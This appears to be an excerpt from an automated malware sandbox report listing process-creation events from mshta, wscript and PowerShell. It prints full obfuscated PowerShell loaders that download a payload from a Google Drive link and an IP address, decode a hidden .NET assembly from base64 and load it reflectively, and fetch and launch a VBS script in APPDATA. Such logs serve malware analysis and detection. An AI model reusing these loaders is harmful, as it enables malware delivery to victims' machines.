'swR',[cHar]36 -CRepLAce 'Fw1',[cHar]124) )"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pShome[21]+$PshOme[30]+'x') ( (('swRimageUrl = 5l7'+'https://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 5l7;swRwebClient = New-Object System.Net.W'+'ebClient;swRimageBytes = swRwebClient.DownloadData(swRimageUrl);sw'+'RimageText = [System'+'.Text.Encoding]'+'::UTF8.GetString(swRimageBytes);swRstartFlag = 5l7<<BA'+'SE64_START>'+'>5l7;swRendFlag = 5l7<<BASE64_END>>5l7;swRs'+'tartIndex = swRimageText.IndexOf'+'(swRstartFlag);swRendIndex = swRimageT'+'ext.IndexOf(swRendFlag);swRstartI'+'ndex -ge 0 -and s'+'wRendIndex -gt swRsta'+'rtIndex;swRstartIndex += swRstartFlag.Length;swRbase64Length = swRendIndex - swRstartIndex;swRbase64Command = swRimageText.Subs'+'tring(swRstartIndex, swRbase64Length);swRbase64Reversed = -jo'+'in (swRbase64Command.ToCharArray('+') Fw1'+' '+'ForEach-Object { swR_ })[-1..-(swRbase64Command.Length)];swRcommandBytes ='+' [System.Convert]::FromBase64String(swRbase64Reversed);swRloadedAssembly = [System.Reflection.Assembly]::Load(swRcommandBytes);swRvaiMethod = [d'+'nlib'+'.IO.Home].GetMethod(5l7VAI5l7);swRvaiMethod.Invoke(swRnull, @(5l7txt.TTRLPMS/14/141.671.3.291//:ptth5l7, 5l7desativado5l7, 5l7desativado5l7, 5l7desativado'+'5l7, '+'5l7aspnet_regbrowsers5l7, 5l7d'+'esativado5l7, 5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l715l7,5l7desativado5l7));') -rePLacE'5l7',[cHar]39 -rePLacE 'swR',[cHar]36 -CRepLAce 'Fw1',[cHar]124) )"
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))"
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))"
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))"Jump to behavior
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))"Jump to behavior
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))"
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTaG9tZVsyMV0rJFBzaE9tZVszMF0rJ3gnKSAoICgoJ3N3UmltYWdlVXJsID0gNWw3JysnaHR0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgNWw3O3N3UndlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c3dSaW1hZ2VCeXRlcyA9IHN3UndlYkNsaWVudC5Eb3dubG9hZERhdGEoc3dSaW1hZ2VVcmwpO3N3JysnUmltYWdlVGV4dCA9IFtTeXN0ZW0nKycuVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHN3UmltYWdlQnl0ZXMpO3N3UnN0YXJ0RmxhZyA9IDVsNzw8QkEnKydTRTY0X1NUQVJUPicrJz41bDc7c3dSZW5kRmxhZyA9IDVsNzw8QkFTRTY0X0VORD4+NWw3O3N3UnMnKyd0YXJ0SW5kZXggPSBzd1JpbWFnZVRleHQuSW5kZXhPZicrJyhzd1JzdGFydEZsYWcpO3N3UmVuZEluZGV4ID0gc3dSaW1hZ2VUJysnZXh0LkluZGV4T2Yoc3dSZW5kRmxhZyk7c3dSc3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHMnKyd3UmVuZEluZGV4IC1ndCBzd1JzdGEnKydydEluZGV4O3N3UnN0YXJ0SW5kZXggKz0gc3dSc3RhcnRGbGFnLkxlbmd0aDtzd1JiYXNlNjRMZW5ndGggPSBzd1JlbmRJbmRleCAtIHN3UnN0YXJ0SW5kZXg7c3dSYmFzZTY0Q29tbWFuZCA9IHN3UmltYWdlVGV4dC5TdWJzJysndHJpbmcoc3dSc3RhcnRJbmRleCwgc3dSYmFzZTY0TGVuZ3RoKTtzd1JiYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChzd1JiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgRncxJysnICcrJ0ZvckVhY2gtT2JqZWN0IHsgc3dSXyB9KVstMS4uLShzd1JiYXNlNjRDb21tYW5kLkxlbmd0aCldO3N3UmNvbW1hbmRCeXRlcyA9JysnIFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoc3dSYmFzZTY0UmV2ZXJzZWQpO3N3UmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChzd1Jjb21tYW5kQnl0ZXMpO3N3UnZhaU1ldGhvZCA9IFtkJysnbmxpYicrJy5JTy5Ib21lXS5HZXRNZXRob2QoNWw3VkFJNWw3KTtzd1J2YWlNZXRob2QuSW52b2tlKHN3Um51bGwsIEAoNWw3dHh0LlRUUkxQTVMvMTQvMTQxLjY3MS4zLjI5MS8vOnB0dGg1bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG8nKyc1bDcsICcrJzVsN2FzcG5ldF9yZWdicm93c2VyczVsNywgNWw3ZCcrJ2VzYXRpdmFkbzVsNywgNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3MTVsNyw1bDdkZXNhdGl2YWRvNWw3KSk7JykgLXJlUExhY0UnNWw3JyxbY0hhcl0zOSAtcmVQTGFjRSAnc3dSJyxbY0hhcl0zNiAgLUNSZXBMQWNlICAnRncxJyxbY0hhcl0xMjQpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pShome[21]+$PshOme[30]+'x') ( (('swRimageUrl = 5l7'+'https://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 5l7;swRwebClient = New-Object System.Net.W'+'ebClient;swRimageBytes = swRwebClient.DownloadData(swRimageUrl);sw'+'RimageText = [System'+'.Text.Encoding]'+'::UTF8.GetString(swRimageBytes);swRstartFlag = 5l7<<BA'+'SE64_START>'+'>5l7;swRendFlag = 5l7<<BASE64_END>>5l7;swRs'+'tartIndex = swRimageText.IndexOf'+'(swRstartFlag);swRendIndex = swRimageT'+'ext.IndexOf(swRendFlag);swRstartI'+'ndex -ge 0 -and s'+'wRendIndex -gt swRsta'+'rtIndex;swRstartIndex += swRstartFlag.Length;swRbase64Length = swRendIndex - swRstartIndex;swRbase64Command = swRimageText.Subs'+'tring(swRstartIndex, swRbase64Length);swRbase64Reversed = -jo'+'in (swRbase64Command.ToCharArray('+') Fw1'+' '+'ForEach-Object { swR_ })[-1..-(swRbase64Command.Length)];swRcommandBytes ='+' [System.Convert]::FromBase64String(swRbase64Reversed);swRloadedAssembly = [System.Reflection.Assembly]::Load(swRcommandBytes);swRvaiMethod = [d'+'nlib'+'.IO.Home].GetMethod(5l7VAI5l7);swRvaiMethod.Invoke(swRnull, @(5l7txt.TTRLPMS/14/141.671.3.291//:ptth5l7, 5l7desativado5l7, 5l7desativado5l7, 5l7desativado'+'5l7, '+'5l7aspnet_regbrowsers5l7, 5l7d'+'esativado5l7, 5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l715l7,5l7desativado5l7));') -rePLacE'5l7',[cHar]39 -rePLacE 'swR',[cHar]36 -CRepLAce 'Fw1',[cHar]124) )"
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))"Jump to behavior
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAg